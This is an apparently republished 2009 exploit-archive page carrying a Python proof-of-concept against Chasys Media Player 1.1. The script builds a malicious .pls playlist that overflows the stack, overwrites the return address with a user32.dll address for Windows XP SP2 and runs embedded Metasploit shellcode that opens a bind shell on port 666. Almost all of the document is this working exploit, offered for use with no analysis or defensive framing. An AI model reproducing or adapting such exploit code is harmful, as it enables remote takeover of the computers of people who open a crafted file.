Chasys Media Player 1.1 (.pls) Stack Overflow Exploit #2
|
来源:www.vfcocus.net 作者:Encrypt3d 发布时间:2009-03-19
|
|
#!/usr/bin/python # Chasys Media Player 1.1 (.pls) Stack Overflow Exploit # By: Encrypt3d.M!nd # # Credit flys to: zAx # # the good thing in this one that the program won't crash # when the playlist file imported,and will keep running.
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D" junk = "\x41"*260
eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2
nops = "\x90" * 20
# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub http://metasploit.com shellcode = ( "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77" "\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb" "\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f" "\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d" "\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c" "\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff" "\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f" "\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44" "\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4" "\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16" "\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47" "\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5" "\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c" "\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d" "\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43" "\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44" "\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39" "\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb" "\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45" "\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4" "\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b" "\x24\xec\xe3\xeb\xa7\x13\x35\x14")
ex = header+junk+eip+nops+shellcode file=open("devil_inside.pls","w") file.write(ex) file.close()
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|